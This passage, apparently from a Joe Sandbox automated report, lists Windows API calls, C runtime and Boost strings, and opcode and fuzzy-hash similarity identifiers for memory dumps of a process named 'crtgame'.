• SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02A320CD
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A320D8
• InterlockedDecrement.KERNEL32(?), ref: 02A3213E
• GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02A3217A
• InterlockedDecrement.KERNEL32(?), ref: 02A32187
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A321A6
Memory Dump Source
• Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
Yara matches
Similarity
• API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
• String ID:
• API String ID: 1171374749-0
• Opcode ID: 1e09c94948a797998c21e4862357454973d353c03b750001bbf70f1f170a2aa7
• Instruction ID: af1be66779c6db83691caa3aec6bb3f36b9883898562b30f8e9efb06633e3374
• Opcode Fuzzy Hash: 1e09c94948a797998c21e4862357454973d353c03b750001bbf70f1f170a2aa7
• Instruction Fuzzy Hash: 5D4109715447019FC312DF25D984A6BBBF9FFC8754F104A1EB89A92250DB30E90ACFA2

APIs
  • Part of subcall function 02A418D0: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02A4112E,?,?), ref: 02A418FF
  • Part of subcall function 02A418D0: CloseHandle.KERNEL32(00000000,?,?,02A4112E,?,?), ref: 02A41914
  • Part of subcall function 02A418D0: SetEvent.KERNEL32(00000000,02A4112E,?,?), ref: 02A41927
• OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02A410B0
• CloseHandle.KERNEL32(00000000), ref: 02A410C5
• ResetEvent.KERNEL32(00000000), ref: 02A410CF
• CloseHandle.KERNEL32(00000000,E756C9BC), ref: 02A41104
• __CxxThrowException@8.LIBCMT ref: 02A41135
  • Part of subcall function 02A43F5A: RaiseException.KERNEL32(?,?,?,02A60F6C,?,00000400,?,?,?,02A4359C,?,02A60F6C,00000000,00000001), ref: 02A43FAF
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,E756C9BC), ref: 02A4117A
• CloseHandle.KERNEL32(00000000), ref: 02A4118F
  • Part of subcall function 02A41610: GetCurrentProcessId.KERNEL32(?), ref: 02A41669
• WaitForSingleObject.KERNEL32(00000000,000000FF,E756C9BC), ref: 02A4119F
Memory Dump Source
• Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
Yara matches
Similarity
• API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
• String ID:
• API String ID: 2227236058-0
• Opcode ID: 36b8db22eb03bc73828d4fd559eb2b79de871c459831d8435f6852ac80351a27
• Instruction ID: ab3fdca6b064039fa490243b967b40d3d91342f85fb50d9f699592240c0e3429
• Opcode Fuzzy Hash: 36b8db22eb03bc73828d4fd559eb2b79de871c459831d8435f6852ac80351a27
• Instruction Fuzzy Hash: BE315271D403589BDF24CBA4DC84BADB7B9AF85714F140219E81DFB280EF60E985CB51

APIs
• __init_pointers.LIBCMT ref: 02A45794
  • Part of subcall function 02A47F02: RtlEncodePointer.NTDLL(00000000), ref: 02A47F05
  • Part of subcall function 02A47F02: __initp_misc_winsig.LIBCMT ref: 02A47F20
  • Part of subcall function 02A47F02: GetModuleHandleW.KERNEL32(kernel32.dll,?), ref: 02A48C81
  • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02A48C95
  • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02A48CA8
  • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02A48CBB
  • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02A48CCE
  • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02A48CE1
  • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02A48CF4
  • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02A48D07
  • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02A48D1A
  • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02A48D2D
  • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02A48D40
  • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02A48D53
  • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02A48D66
  • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02A48D79
  • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02A48D8C
  • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02A48D9F
• __mtinitlocks.LIBCMT ref: 02A45799
• __mtterm.LIBCMT ref: 02A457A2
  • Part of subcall function 02A4580A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02A4833A
  • Part of subcall function 02A4580A: RtlDeleteCriticalSection.NTDLL(02A63978), ref: 02A48363
• __calloc_crt.LIBCMT ref: 02A457C7
• __initptd.LIBCMT ref: 02A457E9
• GetCurrentThreadId.KERNEL32 ref: 02A457F0
Memory Dump Source
• Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
Yara matches
Similarity
• API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
• String ID:
• API String ID: 1500305132-0
• Opcode ID: b9ad63d84455dcdef94f8ad233aaf17efaac29349ebe26958fe8ff5fadb27247
• Instruction ID: 3e397a8dfd20fad9b28be41685e841cbb3990b2abccc592464294a55eed6e8c6
• Opcode Fuzzy Hash: b9ad63d84455dcdef94f8ad233aaf17efaac29349ebe26958fe8ff5fadb27247
• Instruction Fuzzy Hash: BAF02432D993116FE6343B757D45A4E27C6EF91B34BA10A2AE210D50C0FF11D4025A50

APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02A42E73,00000000), ref: 02A42EDB
• GetProcAddress.KERNEL32(00000000), ref: 02A42EE2
• RtlEncodePointer.NTDLL(00000000), ref: 02A42EEE
• RtlDecodePointer.NTDLL(00000001), ref: 02A42F0B
Strings
Memory Dump Source
• Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
Yara matches
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoInitialize$combase.dll
• API String ID: 3489934621-340411864
• Opcode ID: bba5b63f37a8459130c223409fad01e87b4a9d38160fa717e1b48da045fa985f
• Instruction ID: b2900e72c5bedabb1617c249246122aa20ba7bfb2b9a94c8772f9220bfa152f7
• Opcode Fuzzy Hash: bba5b63f37a8459130c223409fad01e87b4a9d38160fa717e1b48da045fa985f
• Instruction Fuzzy Hash: 5FE01A70ED0360BEEB105F70ED4EB067B69B740B02F908824FA02E1090DFB9C0AA8F10

APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02A42EB0), ref: 02A42FB0
• GetProcAddress.KERNEL32(00000000), ref: 02A42FB7
• RtlEncodePointer.NTDLL(00000000), ref: 02A42FC2
• RtlDecodePointer.NTDLL(02A42EB0), ref: 02A42FDD
Strings
Memory Dump Source
• Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
Yara matches
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 3489934621-2819208100
• Opcode ID: 407f6313b672eab496394893451fc579006388a2de5b6f16d2bf0cdeb071ad50
• Instruction ID: b33583a4c29fd287be11a909a6c2fb7f1172eac911e3704ceb908bf8f96c96d2
• Opcode Fuzzy Hash: 407f6313b672eab496394893451fc579006388a2de5b6f16d2bf0cdeb071ad50
• Instruction Fuzzy Hash: DDE0B670DC4314BFEB505F60AD0DB167A69B744B01F518934F902E10A4DFB8D066CB10

APIs
• TlsGetValue.KERNEL32(00000025,E756C9BC,?,?,?,?,00000000,02A564B8,000000FF,02A41BCA), ref: 02A4196A
• TlsSetValue.KERNEL32(00000025,02A41BCA,?,?,00000000), ref: 02A419D7
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A41A01
• HeapFree.KERNEL32(00000000), ref: 02A41A04
Memory Dump Source
• Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
Yara matches
Similarity
• API ID: HeapValue$FreeProcess
• String ID:
• API String ID: 1812714009-0
• Opcode ID: 7df9656468eb44964347f78208496461d48fef31658b636121c0e29b3d13fd86
• Instruction ID: 2da5bdadd383243a2779534de7859f2c286f703566e5edb737475b7d6ef81922
• Opcode Fuzzy Hash: 7df9656468eb44964347f78208496461d48fef31658b636121c0e29b3d13fd86
• Instruction Fuzzy Hash: FF5191319043549FD710CF29C884B16BBE4EF85764F098A69E85D97280DF70EC85CBA1

APIs
• _ValidateScopeTableHandlers.LIBCMT ref: 02A55190
• __FindPESection.LIBCMT ref: 02A551AA
Memory Dump Source
• Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
Yara matches
Similarity
• API ID: FindHandlersScopeSectionTableValidate
• String ID:
• API String ID: 876702719-0
• Opcode ID: 9efcd192c84eb99d70b6a24b6646756f3848044774cee0a091b7a045e165f271
• Instruction ID: da6703b6b28833867de284da4688ddb660624c3875cb140ede8ff2b430f20cca
• Opcode Fuzzy Hash: 9efcd192c84eb99d70b6a24b6646756f3848044774cee0a091b7a045e165f271
• Instruction Fuzzy Hash: F8A18B71E006258FCB10CF58D984BAEF7A5FB45328F9546A9DD09AB391EF31E841CB90

APIs
• WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02A31CB1
• CloseHandle.KERNEL32(?), ref: 02A31CBA
• InterlockedExchangeAdd.KERNEL32(02A674EC,00000000), ref: 02A31CC6
• TerminateThread.KERNEL32(?,00000000), ref: 02A31CD4
• QueueUserAPC.KERNEL32(02A31E7C,?,00000000), ref: 02A31CE1
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 02A31CEC
Memory Dump Source
• Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
Yara matches
Similarity
• API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
• String ID:
• API String ID: 1946104331-0
• Opcode ID: 062165a90508a3844738d53105a80e6cd2eb81956beb5735155067572efdb6e1
• Instruction ID: 96ed7e2e784765afb06fbe1636907ead23d86f800218fe5525ccbcaefc3758e1
• Opcode Fuzzy Hash: 062165a90508a3844738d53105a80e6cd2eb81956beb5735155067572efdb6e1
• Instruction Fuzzy Hash: E2F03C35940324BFDB215B9ADD0DC9BFFFCEF89721B004659F52AA2190DF61A9118B60

APIs
• std::exception::exception.LIBCMT ref: 02A4137F
  • Part of subcall function 02A41ED3: std::exception::_Copy_str.LIBCMT ref: 02A41EEC
  • Part of subcall function 02A40750: __CxxThrowException@8.LIBCMT ref: 02A407AE
• std::exception::exception.LIBCMT ref: 02A413DE
Strings
• boost unique_lock has no mutex, xrefs: 02A4136E
• $, xrefs: 02A413E3
• boost unique_lock owns already the mutex, xrefs: 02A413CD
Memory Dump Source
• Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
Yara matches
Similarity
• API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
• String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
• API String ID: 2140441600-46888669
• Opcode ID: bd6dd45494eb94357784d9286990a2dc1bae30dc4f8dc3579017ed3dc7d9af2f
• Instruction ID: afa50a858d113834a388d477524843a4c1449090e8040a2a4c9238a384f821ab
• Opcode Fuzzy Hash: bd6dd45494eb94357784d9286990a2dc1bae30dc4f8dc3579017ed3dc7d9af2f
• Instruction Fuzzy Hash: CE21F5B15487909FD710DF24C64475BBBE9AB88B08F408E5DF4A587680DFB9D848CF92

APIs
• __getptd_noexit.LIBCMT ref: 02A44480
  • Part of subcall function 02A45672: GetLastError.KERNEL32(?,02A43569,02A45860,02A42A33,00000400,?,02A43569,02A3F37C,?,?,02A3F37C,00000000), ref: 02A45674
  • Part of subcall function 02A45672: __calloc_crt.LIBCMT ref: 02A45695
  • Part of subcall function 02A45672: __initptd.LIBCMT ref: 02A456B7
  • Part of subcall function 02A45672: GetCurrentThreadId.KERNEL32 ref: 02A456BE
  • Part of subcall function 02A45672: SetLastError.KERNEL32(00000000,02A43569,02A3F37C,?,?,02A3F37C,00000000), ref: 02A456D6
• __calloc_crt.LIBCMT ref: 02A444A3
• __get_sys_err_msg.LIBCMT ref: 02A444C1
• __invoke_watson.LIBCMT ref: 02A444DE
Strings
• Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02A4448B, 02A444B1
Memory Dump Source
• Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                                                            • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                            • API String ID: 109275364-798102604
                                                                                            • Opcode ID: bfee42a3f586ae6430acfe1f73f7ddfe61a99ec9fa4d5558abe3be71fe9a3ef8
                                                                                            • Instruction ID: e2c257cfdca67ae6f3b9d876bae7b0ae45de53744db4ecec5d57267628b8e147
                                                                                            • Opcode Fuzzy Hash: bfee42a3f586ae6430acfe1f73f7ddfe61a99ec9fa4d5558abe3be71fe9a3ef8
                                                                                            • Instruction Fuzzy Hash: 84F05972980B146BA62166265D80B2BB3DEEBC9BF1B804426FD44D6600EF39DD000694
                                                                                            APIs
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02A32350
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02A32360
                                                                                            • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02A32370
                                                                                            • GetLastError.KERNEL32 ref: 02A3237A
                                                                                              • Part of subcall function 02A31712: __EH_prolog.LIBCMT ref: 02A31717
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                                            • String ID: pqcs
                                                                                            • API String ID: 1619523792-2559862021
                                                                                            • Opcode ID: 86a80e2a49ee535a9a7e77fccd6109f367c8cf85dc8c68e9a697cc2bf53dd718
                                                                                            • Instruction ID: d10b13b47a1d81166213661356868191a0081b8b4e2d9d91f8deeaa24420e0eb
                                                                                            • Opcode Fuzzy Hash: 86a80e2a49ee535a9a7e77fccd6109f367c8cf85dc8c68e9a697cc2bf53dd718
                                                                                            • Instruction Fuzzy Hash: A3F03070A80314ABD721AF74AD49BABB7ACEF45701B0009AAF909E3140FF70DD558B91
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A34035
                                                                                            • GetProcessHeap.KERNEL32(00000000,02A3A5C3,?,?,?,?,?,02A3A5C3), ref: 02A34042
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02A34049
                                                                                            • std::exception::exception.LIBCMT ref: 02A34063
                                                                                              • Part of subcall function 02A3A053: __EH_prolog.LIBCMT ref: 02A3A058
                                                                                              • Part of subcall function 02A3A053: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02A3A067
                                                                                              • Part of subcall function 02A3A053: __CxxThrowException@8.LIBCMT ref: 02A3A086
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                                            • String ID: bad allocation
                                                                                            • API String ID: 3112922283-2104205924
                                                                                            • Opcode ID: 56f97ba2d51dd282596956f3856c26e948a6075a015a44260eb7756a835dbd8a
                                                                                            • Instruction ID: 14d0509f1feebb73ccf5b5d120b35670ea90131f203be3431b04dac550243abe
                                                                                            • Opcode Fuzzy Hash: 56f97ba2d51dd282596956f3856c26e948a6075a015a44260eb7756a835dbd8a
                                                                                            • Instruction Fuzzy Hash: AAF058B2E84219AFDB11EFE0D908BAFBBB9EF08701F004559E915A2240DF798215CF91
                                                                                            APIs
                                                                                              • Part of subcall function 02A41450: CloseHandle.KERNEL32(00000000,E756C9BC), ref: 02A414A1
                                                                                              • Part of subcall function 02A41450: WaitForSingleObject.KERNEL32(?,000000FF,E756C9BC,?,?,?,?,E756C9BC,02A41423,E756C9BC), ref: 02A414B8
                                                                                            • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02A4171E
                                                                                            • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02A4173E
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02A41777
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02A417CB
                                                                                            • SetEvent.KERNEL32(?), ref: 02A417D2
                                                                                              • Part of subcall function 02A3418C: CloseHandle.KERNEL32(00000000,?,02A41705), ref: 02A341B0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                                            • String ID:
                                                                                            • API String ID: 4166353394-0
                                                                                            • Opcode ID: 88fbca0579c8858e90fe4a8c9eb6441e1e589313607e1f7270475234050d4d71
                                                                                            • Instruction ID: 22e4534ba118915c7a4078e55876ff62e2ea40d1af8b18c51bec98df4f6bef74
                                                                                            • Opcode Fuzzy Hash: 88fbca0579c8858e90fe4a8c9eb6441e1e589313607e1f7270475234050d4d71
                                                                                            • Instruction Fuzzy Hash: EC41CF71640315DBDB259F29CCC0B27B7E8EB85724F140A68EC18AB295DF34D8928F91
                                                                                            APIs
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02A320AC
                                                                                            • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02A320CD
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A320D8
                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 02A3213E
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A321A6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Interlocked$Exchange$DecrementTimerWaitable
                                                                                            • String ID:
                                                                                            • API String ID: 1611172436-0
                                                                                            • Opcode ID: f6feeb6d4696d80443a7f9c4e8de10ced5fe96f0a3ab0fca41d11b87e8bbd5cb
                                                                                            • Instruction ID: c53951a5b4cd9e2d82b2ce09cc8d1c1c08aad15a007477dda500111bcfd7db7d
                                                                                            • Opcode Fuzzy Hash: f6feeb6d4696d80443a7f9c4e8de10ced5fe96f0a3ab0fca41d11b87e8bbd5cb
                                                                                            • Instruction Fuzzy Hash: 0C3148725447019FC312DF25D984A6BB7F9EFC8664F104A1EB89693650DB30E90ACBA2
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A3DA89
                                                                                              • Part of subcall function 02A31A01: TlsGetValue.KERNEL32 ref: 02A31A0A
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A3DB08
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02A3DB24
                                                                                            • InterlockedIncrement.KERNEL32(02A65170), ref: 02A3DB49
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02A3DB5E
                                                                                              • Part of subcall function 02A327F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02A3284E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                                            • String ID:
                                                                                            • API String ID: 1578506061-0
                                                                                            • Opcode ID: 337e899ff174ca3658e49a7db52be84b9856a57e319249485c752c18196bf85b
                                                                                            • Instruction ID: 87735fc060ed14c81d49a7b8840c3b352b2867c01b265bf04d1bbebf5263eb72
                                                                                            • Opcode Fuzzy Hash: 337e899ff174ca3658e49a7db52be84b9856a57e319249485c752c18196bf85b
                                                                                            • Instruction Fuzzy Hash: 5B3137B1D01714EFCB11DFA8D9446AABBF8BF08310F10855AE849E7640EB34A605CFA0
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A321DA
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A321ED
                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02A32224
                                                                                            • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02A32237
                                                                                            • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A32261
                                                                                              • Part of subcall function 02A32341: InterlockedExchange.KERNEL32(?,00000001), ref: 02A32350
                                                                                              • Part of subcall function 02A32341: InterlockedExchange.KERNEL32(?,00000001), ref: 02A32360
                                                                                              • Part of subcall function 02A32341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02A32370
                                                                                              • Part of subcall function 02A32341: GetLastError.KERNEL32 ref: 02A3237A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 1856819132-0
                                                                                            • Opcode ID: d732cb7f09487d9ef1960b2bfb0ece38e97a804a1085c71335912f8ede57d6a0
                                                                                            • Instruction ID: 053165ee21810bdfd6a89c655cfc5fabd2e248173eb02340e3cdedfbc6921711
                                                                                            • Opcode Fuzzy Hash: d732cb7f09487d9ef1960b2bfb0ece38e97a804a1085c71335912f8ede57d6a0
                                                                                            • Instruction Fuzzy Hash: 68116D72D54228DBCB129FA9EC046AFFBBAFF44310F00455AFC15A2260EF718A11CB80
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A3229D
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A322B0
                                                                                            • TlsGetValue.KERNEL32 ref: 02A322E7
                                                                                            • TlsSetValue.KERNEL32(?), ref: 02A32300
                                                                                            • TlsSetValue.KERNEL32(?,?,?), ref: 02A3231C
                                                                                              • Part of subcall function 02A32341: InterlockedExchange.KERNEL32(?,00000001), ref: 02A32350
                                                                                              • Part of subcall function 02A32341: InterlockedExchange.KERNEL32(?,00000001), ref: 02A32360
                                                                                              • Part of subcall function 02A32341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02A32370
                                                                                              • Part of subcall function 02A32341: GetLastError.KERNEL32 ref: 02A3237A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 1856819132-0
                                                                                            • Opcode ID: bfa592dcaf88c85479663a7b82d0853481d24862ca20a631da4f9935dfc17c0c
                                                                                            • Instruction ID: a843cb804425f24165b2784be30a2ab3756a80462415240bc73065fd8b388c6f
                                                                                            • Opcode Fuzzy Hash: bfa592dcaf88c85479663a7b82d0853481d24862ca20a631da4f9935dfc17c0c
                                                                                            • Instruction Fuzzy Hash: 5B112E72D50229ABCB029FA5ED446AEFFBAFF54710F00446AE815A3210DF718951DF90
                                                                                            APIs
                                                                                              • Part of subcall function 02A3AAEE: __EH_prolog.LIBCMT ref: 02A3AAF3
                                                                                            • __CxxThrowException@8.LIBCMT ref: 02A3B6B8
                                                                                              • Part of subcall function 02A43F5A: RaiseException.KERNEL32(?,?,?,02A60F6C,?,00000400,?,?,?,02A4359C,?,02A60F6C,00000000,00000001), ref: 02A43FAF
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02A61DA4,?,00000001), ref: 02A3B6CE
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02A3B6E1
                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02A61DA4,?,00000001), ref: 02A3B6F1
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A3B6FF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                                            • String ID:
                                                                                            • API String ID: 2725315915-0
                                                                                            • Opcode ID: 25688900c6b515e150654487a5edea82a000fb4787195896079be8372ab96523
                                                                                            • Instruction ID: 0ba0bfda718c2d06502a585b8b6cce5c300f41bbd5979432ade289531f60a9a6
                                                                                            • Opcode Fuzzy Hash: 25688900c6b515e150654487a5edea82a000fb4787195896079be8372ab96523
                                                                                            • Instruction Fuzzy Hash: C101D1B2A40314AFDB109BA4DD88E9BB7EDEF04329B004955F615E7281DF60E8018B20
                                                                                            APIs
                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02A32432
                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02A32445
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02A32454
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02A32469
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02A32470
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
